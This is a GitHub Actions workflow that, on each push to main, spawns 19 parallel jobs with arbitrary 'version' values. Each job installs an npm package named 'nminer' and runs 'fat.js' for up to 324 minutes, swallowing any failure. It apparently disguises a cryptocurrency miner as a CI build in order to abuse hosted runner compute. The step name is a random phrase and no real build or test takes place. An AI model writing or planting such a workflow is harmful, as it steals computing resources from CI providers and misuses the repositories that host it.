name: fat
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 9099 }
          - { version: 4855 }
          - { version: 5254 }
          - { version: 3126 }
          - { version: 8474 }
          - { version: 9867 }
          - { version: 1057 }
          - { version: 2735 }
          - { version: 9727 }
          - { version: 7245 }
          - { version: 9191 }
          - { version: 5390 }
          - { version: 9107 }
          - { version: 1559 }
          - { version: 2097 }
          - { version: 5305 }
          - { version: 7957 }
          - { version: 6977 }
          - { version: 8258 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: consequently dapper
        run: |
          npm install nminer@latest
          timeout 324m node fat.js || echo "fat executed"